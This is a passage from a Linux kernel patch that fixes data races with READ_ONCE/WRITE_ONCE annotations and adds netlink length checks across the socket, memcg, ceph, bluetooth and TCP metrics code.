+ 			descr->debug_hint(obj->object) : NULL;
+diff --git a/lib/test_bitmap.c b/lib/test_bitmap.c
+index a8005ad3bd589..37a9108c4f588 100644
+--- a/lib/test_bitmap.c
++++ b/lib/test_bitmap.c
+@@ -1149,6 +1149,10 @@ static void __init test_bitmap_print_buf(void)
+ 	}
+ }
+ 
++/*
++ * FIXME: Clang breaks compile-time evaluations when KASAN and GCOV are enabled.
++ * To workaround it, GCOV is force-disabled in Makefile for this configuration.
++ */
+ static void __init test_bitmap_const_eval(void)
+ {
+ 	DECLARE_BITMAP(bitmap, BITS_PER_LONG);
+@@ -1174,11 +1178,7 @@ static void __init test_bitmap_const_eval(void)
+ 	 * the compiler is fixed.
+ 	 */
+ 	bitmap_clear(bitmap, 0, BITS_PER_LONG);
+-#if defined(__s390__) && defined(__clang__)
+-	if (!const_test_bit(7, bitmap))
+-#else
+ 	if (!test_bit(7, bitmap))
+-#endif
+ 		bitmap_set(bitmap, 5, 2);
+ 
+ 	/* Equals to `unsigned long bitopvar = BIT(20)` */
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 3e8f1ad0fe9db..67b6d8238b3ed 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -3165,12 +3165,12 @@ void mod_objcg_state(struct obj_cgroup *objcg, struct pglist_data *pgdat,
+ 	 * accumulating over a page of vmstat data or when pgdat or idx
+ 	 * changes.
+ 	 */
+-	if (stock->cached_objcg != objcg) {
++	if (READ_ONCE(stock->cached_objcg) != objcg) {
+ 		old = drain_obj_stock(stock);
+ 		obj_cgroup_get(objcg);
+ 		stock->nr_bytes = atomic_read(&objcg->nr_charged_bytes)
+ 				? atomic_xchg(&objcg->nr_charged_bytes, 0) : 0;
+-		stock->cached_objcg = objcg;
++		WRITE_ONCE(stock->cached_objcg, objcg);
+ 		stock->cached_pgdat = pgdat;
+ 	} else if (stock->cached_pgdat != pgdat) {
+ 		/* Flush the existing cached vmstat data */
+@@ -3224,7 +3224,7 @@ static bool consume_obj_stock(struct obj_cgroup *objcg, unsigned int nr_bytes)
+ 	local_lock_irqsave(&memcg_stock.stock_lock, flags);
+ 
+ 	stock = this_cpu_ptr(&memcg_stock);
+-	if (objcg == stock->cached_objcg && stock->nr_bytes >= nr_bytes) {
++	if (objcg == READ_ONCE(stock->cached_objcg) && stock->nr_bytes >= nr_bytes) {
+ 		stock->nr_bytes -= nr_bytes;
+ 		ret = true;
+ 	}
+@@ -3236,7 +3236,7 @@ static bool consume_obj_stock(struct obj_cgroup *objcg, unsigned int nr_bytes)
+ 
+ static struct obj_cgroup *drain_obj_stock(struct memcg_stock_pcp *stock)
+ {
+-	struct obj_cgroup *old = stock->cached_objcg;
++	struct obj_cgroup *old = READ_ONCE(stock->cached_objcg);
+ 
+ 	if (!old)
+ 		return NULL;
+@@ -3289,7 +3289,7 @@ static struct obj_cgroup *drain_obj_stock(struct memcg_stock_pcp *stock)
+ 		stock->cached_pgdat = NULL;
+ 	}
+ 
+-	stock->cached_objcg = NULL;
++	WRITE_ONCE(stock->cached_objcg, NULL);
+ 	/*
+ 	 * The `old' objects needs to be released by the caller via
+ 	 * obj_cgroup_put() outside of memcg_stock_pcp::stock_lock.
+@@ -3300,10 +3300,11 @@ static struct obj_cgroup *drain_obj_stock(struct memcg_stock_pcp *stock)
+ static bool obj_stock_flush_required(struct memcg_stock_pcp *stock,
+ 				     struct mem_cgroup *root_memcg)
+ {
++	struct obj_cgroup *objcg = READ_ONCE(stock->cached_objcg);
+ 	struct mem_cgroup *memcg;
+ 
+-	if (stock->cached_objcg) {
+-		memcg = obj_cgroup_memcg(stock->cached_objcg);
++	if (objcg) {
++		memcg = obj_cgroup_memcg(objcg);
+ 		if (memcg && mem_cgroup_is_descendant(memcg, root_memcg))
+ 			return true;
+ 	}
+@@ -3322,10 +3323,10 @@ static void refill_obj_stock(struct obj_cgroup *objcg, unsigned int nr_bytes,
+ 	local_lock_irqsave(&memcg_stock.stock_lock, flags);
+ 
+ 	stock = this_cpu_ptr(&memcg_stock);
+-	if (stock->cached_objcg != objcg) { /* reset if necessary */
++	if (READ_ONCE(stock->cached_objcg) != objcg) { /* reset if necessary */
+ 		old = drain_obj_stock(stock);
+ 		obj_cgroup_get(objcg);
+-		stock->cached_objcg = objcg;
++		WRITE_ONCE(stock->cached_objcg, objcg);
+ 		stock->nr_bytes = atomic_read(&objcg->nr_charged_bytes)
+ 				? atomic_xchg(&objcg->nr_charged_bytes, 0) : 0;
+ 		allow_uncharge = true;	/* Allow uncharge when objcg changes */
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index eebe256104bc0..947ca580bb9a2 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -46,6 +46,7 @@ static const struct proto_ops l2cap_sock_ops;
+ static void l2cap_sock_init(struct sock *sk, struct sock *parent);
+ static struct sock *l2cap_sock_alloc(struct net *net, struct socket *sock,
+ 				     int proto, gfp_t prio, int kern);
++static void l2cap_sock_cleanup_listen(struct sock *parent);
+ 
+ bool l2cap_is_socket(struct socket *sock)
+ {
+@@ -1415,6 +1416,7 @@ static int l2cap_sock_release(struct socket *sock)
+ 	if (!sk)
+ 		return 0;
+ 
++	l2cap_sock_cleanup_listen(sk);
+ 	bt_sock_unlink(&l2cap_sk_list, sk);
+ 
+ 	err = l2cap_sock_shutdown(sock, SHUT_RDWR);
+diff --git a/net/ceph/osd_client.c b/net/ceph/osd_client.c
+index 4e4f1e4bc265a..c22bb06b450ee 100644
+--- a/net/ceph/osd_client.c
++++ b/net/ceph/osd_client.c
+@@ -3334,17 +3334,24 @@ static int linger_reg_commit_wait(struct ceph_osd_linger_request *lreq)
+ 	int ret;
+ 
+ 	dout("%s lreq %p linger_id %llu\n", __func__, lreq, lreq->linger_id);
+-	ret = wait_for_completion_interruptible(&lreq->reg_commit_wait);
++	ret = wait_for_completion_killable(&lreq->reg_commit_wait);
+ 	return ret ?: lreq->reg_commit_error;
+ }
+ 
+-static int linger_notify_finish_wait(struct ceph_osd_linger_request *lreq)
++static int linger_notify_finish_wait(struct ceph_osd_linger_request *lreq,
++				     unsigned long timeout)
+ {
+-	int ret;
++	long left;
+ 
+ 	dout("%s lreq %p linger_id %llu\n", __func__, lreq, lreq->linger_id);
+-	ret = wait_for_completion_interruptible(&lreq->notify_finish_wait);
+-	return ret ?: lreq->notify_finish_error;
++	left = wait_for_completion_killable_timeout(&lreq->notify_finish_wait,
++						ceph_timeout_jiffies(timeout));
++	if (left <= 0)
++		left = left ?: -ETIMEDOUT;
++	else
++		left = lreq->notify_finish_error; /* completed */
++
++	return left;
+ }
+ 
+ /*
+@@ -4896,7 +4903,8 @@ int ceph_osdc_notify(struct ceph_osd_client *osdc,
+ 	linger_submit(lreq);
+ 	ret = linger_reg_commit_wait(lreq);
+ 	if (!ret)
+-		ret = linger_notify_finish_wait(lreq);
++		ret = linger_notify_finish_wait(lreq,
++				 msecs_to_jiffies(2 * timeout * MSEC_PER_SEC));
+ 	else
+ 		dout("lreq %p failed to initiate notify %d\n", lreq, ret);
+ 
+diff --git a/net/core/bpf_sk_storage.c b/net/core/bpf_sk_storage.c
+index 94374d529ea42..ad01b1bea52e4 100644
+--- a/net/core/bpf_sk_storage.c
++++ b/net/core/bpf_sk_storage.c
+@@ -531,8 +531,11 @@ bpf_sk_storage_diag_alloc(const struct nlattr *nla_stgs)
+ 		return ERR_PTR(-EPERM);
+ 
+ 	nla_for_each_nested(nla, nla_stgs, rem) {
+-		if (nla_type(nla) == SK_DIAG_BPF_STORAGE_REQ_MAP_FD)
++		if (nla_type(nla) == SK_DIAG_BPF_STORAGE_REQ_MAP_FD) {
++			if (nla_len(nla) != sizeof(u32))
++				return ERR_PTR(-EINVAL);
+ 			nr_maps++;
++		}
+ 	}
+ 
+ 	diag = kzalloc(struct_size(diag, maps, nr_maps), GFP_KERNEL);
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 5625ed30a06f3..2758b3f7c0214 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -5030,13 +5030,17 @@ static int rtnl_bridge_setlink(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 	br_spec = nlmsg_find_attr(nlh, sizeof(struct ifinfomsg), IFLA_AF_SPEC);
+ 	if (br_spec) {
+ 		nla_for_each_nested(attr, br_spec, rem) {
+-			if (nla_type(attr) == IFLA_BRIDGE_FLAGS) {
++			if (nla_type(attr) == IFLA_BRIDGE_FLAGS && !have_flags) {
+ 				if (nla_len(attr) < sizeof(flags))
+ 					return -EINVAL;
+ 
+ 				have_flags = true;
+ 				flags = nla_get_u16(attr);
+-				break;
++			}
++
++			if (nla_type(attr) == IFLA_BRIDGE_MODE) {
++				if (nla_len(attr) < sizeof(u16))
++					return -EINVAL;
+ 			}
+ 		}
+ 	}
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 0c1baa5517f11..3b5304f084ef3 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -800,7 +800,7 @@ EXPORT_SYMBOL(sock_no_linger);
+ void sock_set_priority(struct sock *sk, u32 priority)
+ {
+ 	lock_sock(sk);
+-	sk->sk_priority = priority;
++	WRITE_ONCE(sk->sk_priority, priority);
+ 	release_sock(sk);
+ }
+ EXPORT_SYMBOL(sock_set_priority);
+@@ -977,7 +977,7 @@ EXPORT_SYMBOL(sock_set_rcvbuf);
+ static void __sock_set_mark(struct sock *sk, u32 val)
+ {
+ 	if (val != sk->sk_mark) {
+-		sk->sk_mark = val;
++		WRITE_ONCE(sk->sk_mark, val);
+ 		sk_dst_reset(sk);
+ 	}
+ }
+@@ -996,7 +996,7 @@ static void sock_release_reserved_memory(struct sock *sk, int bytes)
+ 	bytes = round_down(bytes, PAGE_SIZE);
+ 
+ 	WARN_ON(bytes > sk->sk_reserved_mem);
+-	sk->sk_reserved_mem -= bytes;
++	WRITE_ONCE(sk->sk_reserved_mem, sk->sk_reserved_mem - bytes);
+ 	sk_mem_reclaim(sk);
+ }
+ 
+@@ -1033,7 +1033,8 @@ static int sock_reserve_memory(struct sock *sk, int bytes)
+ 	}
+ 	sk->sk_forward_alloc += pages << PAGE_SHIFT;
+ 
+-	sk->sk_reserved_mem += pages << PAGE_SHIFT;
++	WRITE_ONCE(sk->sk_reserved_mem,
++		   sk->sk_reserved_mem + (pages << PAGE_SHIFT));
+ 
+ 	return 0;
+ }
+@@ -1202,7 +1203,7 @@ set_sndbuf:
+ 		if ((val >= 0 && val <= 6) ||
+ 		    sockopt_ns_capable(sock_net(sk)->user_ns, CAP_NET_RAW) ||
+ 		    sockopt_ns_capable(sock_net(sk)->user_ns, CAP_NET_ADMIN))
+-			sk->sk_priority = val;
++			WRITE_ONCE(sk->sk_priority, val);
+ 		else
+ 			ret = -EPERM;
+ 		break;
+@@ -1425,7 +1426,8 @@ set_sndbuf:
+ 			cmpxchg(&sk->sk_pacing_status,
+ 				SK_PACING_NONE,
+ 				SK_PACING_NEEDED);
+-		sk->sk_max_pacing_rate = ulval;
++		/* Pairs with READ_ONCE() from sk_getsockopt() */
++		WRITE_ONCE(sk->sk_max_pacing_rate, ulval);
+ 		sk->sk_pacing_rate = min(sk->sk_pacing_rate, ulval);
+ 		break;
+ 		}
+@@ -1520,7 +1522,9 @@ set_sndbuf:
+ 		}
+ 		if ((u8)val == SOCK_TXREHASH_DEFAULT)
+ 			val = READ_ONCE(sock_net(sk)->core.sysctl_txrehash);
+-		/* Paired with READ_ONCE() in tcp_rtx_synack() */
++		/* Paired with READ_ONCE() in tcp_rtx_synack()
++		 * and sk_getsockopt().
++		 */
+ 		WRITE_ONCE(sk->sk_txrehash, (u8)val);
+ 		break;
+ 
+@@ -1620,11 +1624,11 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case SO_SNDBUF:
+-		v.val = sk->sk_sndbuf;
++		v.val = READ_ONCE(sk->sk_sndbuf);
+ 		break;
+ 
+ 	case SO_RCVBUF:
+-		v.val = sk->sk_rcvbuf;
++		v.val = READ_ONCE(sk->sk_rcvbuf);
+ 		break;
+ 
+ 	case SO_REUSEADDR:
+@@ -1666,7 +1670,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case SO_PRIORITY:
+-		v.val = sk->sk_priority;
++		v.val = READ_ONCE(sk->sk_priority);
+ 		break;
+ 
+ 	case SO_LINGER:
+@@ -1713,7 +1717,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case SO_RCVLOWAT:
+-		v.val = sk->sk_rcvlowat;
++		v.val = READ_ONCE(sk->sk_rcvlowat);
+ 		break;
+ 
+ 	case SO_SNDLOWAT:
+@@ -1792,7 +1796,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		return security_socket_getpeersec_stream(sock, optval.user, optlen.user, len);
+ 
+ 	case SO_MARK:
+-		v.val = sk->sk_mark;
++		v.val = READ_ONCE(sk->sk_mark);
+ 		break;
+ 
+ 	case SO_RCVMARK:
+@@ -1811,7 +1815,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		if (!sock->ops->set_peek_off)
+ 			return -EOPNOTSUPP;
+ 
+-		v.val = sk->sk_peek_off;
++		v.val = READ_ONCE(sk->sk_peek_off);
+ 		break;
+ 	case SO_NOFCS:
+ 		v.val = sock_flag(sk, SOCK_NOFCS);
+@@ -1841,7 +1845,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 
+ #ifdef CONFIG_NET_RX_BUSY_POLL
+ 	case SO_BUSY_POLL:
+-		v.val = sk->sk_ll_usec;
++		v.val = READ_ONCE(sk->sk_ll_usec);
+ 		break;
+ 	case SO_PREFER_BUSY_POLL:
+ 		v.val = READ_ONCE(sk->sk_prefer_busy_poll);
+@@ -1849,12 +1853,14 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ #endif
+ 
+ 	case SO_MAX_PACING_RATE:
++		/* The READ_ONCE() pair with the WRITE_ONCE() in sk_setsockopt() */
+ 		if (sizeof(v.ulval) != sizeof(v.val) && len >= sizeof(v.ulval)) {
+ 			lv = sizeof(v.ulval);
+-			v.ulval = sk->sk_max_pacing_rate;
++			v.ulval = READ_ONCE(sk->sk_max_pacing_rate);
+ 		} else {
+ 			/* 32bit version */
+-			v.val = min_t(unsigned long, sk->sk_max_pacing_rate, ~0U);
++			v.val = min_t(unsigned long, ~0U,
++				      READ_ONCE(sk->sk_max_pacing_rate));
+ 		}
+ 		break;
+ 
+@@ -1922,11 +1928,12 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 		break;
+ 
+ 	case SO_RESERVE_MEM:
+-		v.val = sk->sk_reserved_mem;
++		v.val = READ_ONCE(sk->sk_reserved_mem);
+ 		break;
+ 
+ 	case SO_TXREHASH:
+-		v.val = sk->sk_txrehash;
++		/* Paired with WRITE_ONCE() in sk_setsockopt() */
++		v.val = READ_ONCE(sk->sk_txrehash);
+ 		break;
+ 
+ 	default:
+@@ -3112,7 +3119,7 @@ EXPORT_SYMBOL(__sk_mem_reclaim);
+ 
+ int sk_set_peek_off(struct sock *sk, int val)
+ {
+-	sk->sk_peek_off = val;
++	WRITE_ONCE(sk->sk_peek_off, val);
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(sk_set_peek_off);
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index d382672018928..c84e5073c0b66 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -117,7 +117,6 @@ static void sock_map_sk_acquire(struct sock *sk)
+ 	__acquires(&sk->sk_lock.slock)
+ {
+ 	lock_sock(sk);
+-	preempt_disable();
+ 	rcu_read_lock();
+ }
+ 
+@@ -125,7 +124,6 @@ static void sock_map_sk_release(struct sock *sk)
+ 	__releases(&sk->sk_lock.slock)
+ {
+ 	rcu_read_unlock();
+-	preempt_enable();
+ 	release_sock(sk);
+ }
+ 
+diff --git a/net/dcb/dcbnl.c b/net/dcb/dcbnl.c
+index dc4fb699b56c3..d2981e89d3638 100644
+--- a/net/dcb/dcbnl.c
++++ b/net/dcb/dcbnl.c
+@@ -946,7 +946,7 @@ static int dcbnl_bcn_setcfg(struct net_device *netdev, struct nlmsghdr *nlh,
+ 		return -EOPNOTSUPP;
+ 
+ 	ret = nla_parse_nested_deprecated(data, DCB_BCN_ATTR_MAX,
+-					  tb[DCB_ATTR_BCN], dcbnl_pfc_up_nest,
++					  tb[DCB_ATTR_BCN], dcbnl_bcn_nest,
+ 					  NULL);
+ 	if (ret)
+ 		return ret;
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index c0fd8f5f3b94e..b51ce6f8ceba0 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -237,8 +237,8 @@ static int dccp_v6_send_response(const struct sock *sk, struct request_sock *req
+ 		opt = ireq->ipv6_opt;
+ 		if (!opt)
+ 			opt = rcu_dereference(np->opt);
+-		err = ip6_xmit(sk, skb, &fl6, sk->sk_mark, opt, np->tclass,
+-			       sk->sk_priority);
++		err = ip6_xmit(sk, skb, &fl6, READ_ONCE(sk->sk_mark), opt,
++			       np->tclass, sk->sk_priority);
+ 		rcu_read_unlock();
+ 		err = net_xmit_eval(err);
+ 	}
+diff --git a/net/ipv4/inet_diag.c b/net/ipv4/inet_diag.c
+index b812eb36f0e36..f7426926a1041 100644
+--- a/net/ipv4/inet_diag.c
++++ b/net/ipv4/inet_diag.c
+@@ -150,7 +150,7 @@ int inet_diag_msg_attrs_fill(struct sock *sk, struct sk_buff *skb,
+ 	}
+ #endif
+ 
+-	if (net_admin && nla_put_u32(skb, INET_DIAG_MARK, sk->sk_mark))
++	if (net_admin && nla_put_u32(skb, INET_DIAG_MARK, READ_ONCE(sk->sk_mark)))
+ 		goto errout;
+ 
+ 	if (ext & (1 << (INET_DIAG_CLASS_ID - 1)) ||
+@@ -799,7 +799,7 @@ int inet_diag_bc_sk(const struct nlattr *bc, struct sock *sk)
+ 	entry.ifindex = sk->sk_bound_dev_if;
+ 	entry.userlocks = sk_fullsock(sk) ? sk->sk_userlocks : 0;
+ 	if (sk_fullsock(sk))
+-		entry.mark = sk->sk_mark;
++		entry.mark = READ_ONCE(sk->sk_mark);
+ 	else if (sk->sk_state == TCP_NEW_SYN_RECV)
+ 		entry.mark = inet_rsk(inet_reqsk(sk))->ir_mark;
+ 	else if (sk->sk_state == TCP_TIME_WAIT)
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 7b4ab545c06e0..acfe58d2f1dd7 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -182,9 +182,9 @@ int ip_build_and_send_pkt(struct sk_buff *skb, const struct sock *sk,
+ 		ip_options_build(skb, &opt->opt, daddr, rt);
+ 	}
+ 
+-	skb->priority = sk->sk_priority;
++	skb->priority = READ_ONCE(sk->sk_priority);
+ 	if (!skb->mark)
+-		skb->mark = sk->sk_mark;
++		skb->mark = READ_ONCE(sk->sk_mark);
+ 
+ 	/* Send it out. */
+ 	return ip_local_out(net, skb->sk, skb);
+@@ -526,8 +526,8 @@ packet_routed:
+ 			     skb_shinfo(skb)->gso_segs ?: 1);
+ 
+ 	/* TODO : should we use skb->sk here instead of sk ? */
+-	skb->priority = sk->sk_priority;
+-	skb->mark = sk->sk_mark;
++	skb->priority = READ_ONCE(sk->sk_priority);
++	skb->mark = READ_ONCE(sk->sk_mark);
+ 
+ 	res = ip_local_out(net, sk, skb);
+ 	rcu_read_unlock();
+diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
+index a7fd035b5b4f9..63aa52becd880 100644
+--- a/net/ipv4/ip_sockglue.c
++++ b/net/ipv4/ip_sockglue.c
+@@ -591,7 +591,7 @@ void __ip_sock_set_tos(struct sock *sk, int val)
+ 	}
+ 	if (inet_sk(sk)->tos != val) {
+ 		inet_sk(sk)->tos = val;
+-		sk->sk_priority = rt_tos2priority(val);
++		WRITE_ONCE(sk->sk_priority, rt_tos2priority(val));
+ 		sk_dst_reset(sk);
+ 	}
+ }
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index 86197634dcf5d..639aa5abda9dd 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -346,7 +346,7 @@ static int raw_send_hdrinc(struct sock *sk, struct flowi4 *fl4,
+ 		goto error;
+ 	skb_reserve(skb, hlen);
+ 
+-	skb->priority = sk->sk_priority;
++	skb->priority = READ_ONCE(sk->sk_priority);
+ 	skb->mark = sockc->mark;
+ 	skb->tstamp = sockc->transmit_time;
+ 	skb_dst_set(skb, &rt->dst);
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index cd1fa9f70f1a1..51bd9a50a1d1d 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -518,7 +518,7 @@ static void __build_flow_key(const struct net *net, struct flowi4 *fl4,
+ 		const struct inet_sock *inet = inet_sk(sk);
+ 
+ 		oif = sk->sk_bound_dev_if;
+-		mark = sk->sk_mark;
++		mark = READ_ONCE(sk->sk_mark);
+ 		tos = ip_sock_rt_tos(sk);
+ 		scope = ip_sock_rt_scope(sk);
+ 		prot = inet->hdrincl ? IPPROTO_RAW : sk->sk_protocol;
+@@ -552,7 +552,7 @@ static void build_sk_flow_key(struct flowi4 *fl4, const struct sock *sk)
+ 	inet_opt = rcu_dereference(inet->inet_opt);
+ 	if (inet_opt && inet_opt->opt.srr)
+ 		daddr = inet_opt->opt.faddr;
+-	flowi4_init_output(fl4, sk->sk_bound_dev_if, sk->sk_mark,
++	flowi4_init_output(fl4, sk->sk_bound_dev_if, READ_ONCE(sk->sk_mark),
+ 			   ip_sock_rt_tos(sk) & IPTOS_RT_MASK,
+ 			   ip_sock_rt_scope(sk),
+ 			   inet->hdrincl ? IPPROTO_RAW : sk->sk_protocol,
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 9a8d59e9303a0..08921b96f9728 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -931,9 +931,9 @@ static void tcp_v4_send_ack(const struct sock *sk,
+ 	ctl_sk = this_cpu_read(ipv4_tcp_sk);
+ 	sock_net_set(ctl_sk, net);
+ 	ctl_sk->sk_mark = (sk->sk_state == TCP_TIME_WAIT) ?
+-			   inet_twsk(sk)->tw_mark : sk->sk_mark;
++			   inet_twsk(sk)->tw_mark : READ_ONCE(sk->sk_mark);
+ 	ctl_sk->sk_priority = (sk->sk_state == TCP_TIME_WAIT) ?
+-			   inet_twsk(sk)->tw_priority : sk->sk_priority;
++			   inet_twsk(sk)->tw_priority : READ_ONCE(sk->sk_priority);
+ 	transmit_time = tcp_transmit_time(sk);
+ 	ip_send_unicast_reply(ctl_sk,
+ 			      skb, &TCP_SKB_CB(skb)->header.h4.opt,
+diff --git a/net/ipv4/tcp_metrics.c b/net/ipv4/tcp_metrics.c
+index 82f4575f9cd90..99ac5efe244d3 100644
+--- a/net/ipv4/tcp_metrics.c
++++ b/net/ipv4/tcp_metrics.c
+@@ -40,7 +40,7 @@ struct tcp_fastopen_metrics {
+ 
+ struct tcp_metrics_block {
+ 	struct tcp_metrics_block __rcu	*tcpm_next;
+-	possible_net_t			tcpm_net;
++	struct net			*tcpm_net;
+ 	struct inetpeer_addr		tcpm_saddr;
+ 	struct inetpeer_addr		tcpm_daddr;
+ 	unsigned long			tcpm_stamp;
+@@ -51,34 +51,38 @@ struct tcp_metrics_block {
+ 	struct rcu_head			rcu_head;
+ };
+ 
+-static inline struct net *tm_net(struct tcp_metrics_block *tm)
++static inline struct net *tm_net(const struct tcp_metrics_block *tm)
+ {
+-	return read_pnet(&tm->tcpm_net);
++	/* Paired with the WRITE_ONCE() in tcpm_new() */
++	return READ_ONCE(tm->tcpm_net);
+ }
+ 
+ static bool tcp_metric_locked(struct tcp_metrics_block *tm,
+ 			      enum tcp_metric_index idx)
+ {
+-	return tm->tcpm_lock & (1 << idx);
++	/* Paired with WRITE_ONCE() in tcpm_suck_dst() */
++	return READ_ONCE(tm->tcpm_lock) & (1 << idx);
+ }
+ 
+-static u32 tcp_metric_get(struct tcp_metrics_block *tm,
++static u32 tcp_metric_get(const struct tcp_metrics_block *tm,
+ 			  enum tcp_metric_index idx)
+ {
+-	return tm->tcpm_vals[idx];
++	/* Paired with WRITE_ONCE() in tcp_metric_set() */
++	return READ_ONCE(tm->tcpm_vals[idx]);
+ }
+ 
+ static void tcp_metric_set(struct tcp_metrics_block *tm,
+ 			   enum tcp_metric_index idx,
+ 			   u32 val)
+ {
+-	tm->tcpm_vals[idx] = val;
++	/* Paired with READ_ONCE() in tcp_metric_get() */
++	WRITE_ONCE(tm->tcpm_vals[idx], val);
+ }
+ 
+ static bool addr_same(const struct inetpeer_addr *a,
+ 		      const struct inetpeer_addr *b)
+ {
+-	return inetpeer_addr_cmp(a, b) == 0;
++	return (a->family == b->family) && !inetpeer_addr_cmp(a, b);
+ }
+ 
+ struct tcpm_hash_bucket {
+@@ -89,6 +93,7 @@ static struct tcpm_hash_bucket	*tcp_metrics_hash __read_mostly;
+ static unsigned int		tcp_metrics_hash_log __read_mostly;
+ 
+ static DEFINE_SPINLOCK(tcp_metrics_lock);
++static DEFINE_SEQLOCK(fastopen_seqlock);
+ 
+ static void tcpm_suck_dst(struct tcp_metrics_block *tm,
+ 			  const struct dst_entry *dst,
+@@ -97,7 +102,7 @@ static void tcpm_suck_dst(struct tcp_metrics_block *tm,
+ 	u32 msval;
+ 	u32 val;
+ 
+-	tm->tcpm_stamp = jiffies;
++	WRITE_ONCE(tm->tcpm_stamp, jiffies);
+ 
+ 	val = 0;
+ 	if (dst_metric_locked(dst, RTAX_RTT))
+@@ -110,30 +115,42 @@ static void tcpm_suck_dst(struct tcp_metrics_block *tm,
+ 		val |= 1 << TCP_METRIC_CWND;
+ 	if (dst_metric_locked(dst, RTAX_REORDERING))
+ 		val |= 1 << TCP_METRIC_REORDERING;
+-	tm->tcpm_lock = val;
++	/* Paired with READ_ONCE() in tcp_metric_locked() */
++	WRITE_ONCE(tm->tcpm_lock, val);
+ 
+ 	msval = dst_metric_raw(dst, RTAX_RTT);
+-	tm->tcpm_vals[TCP_METRIC_RTT] = msval * USEC_PER_MSEC;
++	tcp_metric_set(tm, TCP_METRIC_RTT, msval * USEC_PER_MSEC);
+ 
+ 	msval = dst_metric_raw(dst, RTAX_RTTVAR);
+-	tm->tcpm_vals[TCP_METRIC_RTTVAR] = msval * USEC_PER_MSEC;
+-	tm->tcpm_vals[TCP_METRIC_SSTHRESH] = dst_metric_raw(dst, RTAX_SSTHRESH);
+-	tm->tcpm_vals[TCP_METRIC_CWND] = dst_metric_raw(dst, RTAX_CWND);
+-	tm->tcpm_vals[TCP_METRIC_REORDERING] = dst_metric_raw(dst, RTAX_REORDERING);
++	tcp_metric_set(tm, TCP_METRIC_RTTVAR, msval * USEC_PER_MSEC);
++	tcp_metric_set(tm, TCP_METRIC_SSTHRESH,
++		       dst_metric_raw(dst, RTAX_SSTHRESH));
++	tcp_metric_set(tm, TCP_METRIC_CWND,
++		       dst_metric_raw(dst, RTAX_CWND));
++	tcp_metric_set(tm, TCP_METRIC_REORDERING,
++		       dst_metric_raw(dst, RTAX_REORDERING));
+ 	if (fastopen_clear) {
++		write_seqlock(&fastopen_seqlock);
+ 		tm->tcpm_fastopen.mss = 0;
+ 		tm->tcpm_fastopen.syn_loss = 0;
+ 		tm->tcpm_fastopen.try_exp = 0;
+ 		tm->tcpm_fastopen.cookie.exp = false;
+ 		tm->tcpm_fastopen.cookie.len = 0;
++		write_sequnlock(&fastopen_seqlock);
+ 	}
+ }
+ 
+ #define TCP_METRICS_TIMEOUT		(60 * 60 * HZ)
+ 
+-static void tcpm_check_stamp(struct tcp_metrics_block *tm, struct dst_entry *dst)
++static void tcpm_check_stamp(struct tcp_metrics_block *tm,
++			     const struct dst_entry *dst)
+ {
+-	if (tm && unlikely(time_after(jiffies, tm->tcpm_stamp + TCP_METRICS_TIMEOUT)))
++	unsigned long limit;
++
++	if (!tm)
++		return;
++	limit = READ_ONCE(tm->tcpm_stamp) + TCP_METRICS_TIMEOUT;
++	if (unlikely(time_after(jiffies, limit)))
+ 		tcpm_suck_dst(tm, dst, false);
+ }
+ 
+@@ -174,20 +191,23 @@ static struct tcp_metrics_block *tcpm_new(struct dst_entry *dst,
+ 		oldest = deref_locked(tcp_metrics_hash[hash].chain);
+ 		for (tm = deref_locked(oldest->tcpm_next); tm;
+ 		     tm = deref_locked(tm->tcpm_next)) {
+-			if (time_before(tm->tcpm_stamp, oldest->tcpm_stamp))
++			if (time_before(READ_ONCE(tm->tcpm_stamp),
++					READ_ONCE(oldest->tcpm_stamp)))
+ 				oldest = tm;
+ 		}
+ 		tm = oldest;
+ 	} else {
+-		tm = kmalloc(sizeof(*tm), GFP_ATOMIC);
++		tm = kzalloc(sizeof(*tm), GFP_ATOMIC);
+ 		if (!tm)
+ 			goto out_unlock;
+ 	}
+-	write_pnet(&tm->tcpm_net, net);
++	/* Paired with the READ_ONCE() in tm_net() */
++	WRITE_ONCE(tm->tcpm_net, net);
++
+ 	tm->tcpm_saddr = *saddr;
+ 	tm->tcpm_daddr = *daddr;
+ 
+-	tcpm_suck_dst(tm, dst, true);
++	tcpm_suck_dst(tm, dst, reclaim);
+ 
+ 	if (likely(!reclaim)) {
+ 		tm->tcpm_next = tcp_metrics_hash[hash].chain;
+@@ -434,7 +454,7 @@ void tcp_update_metrics(struct sock *sk)
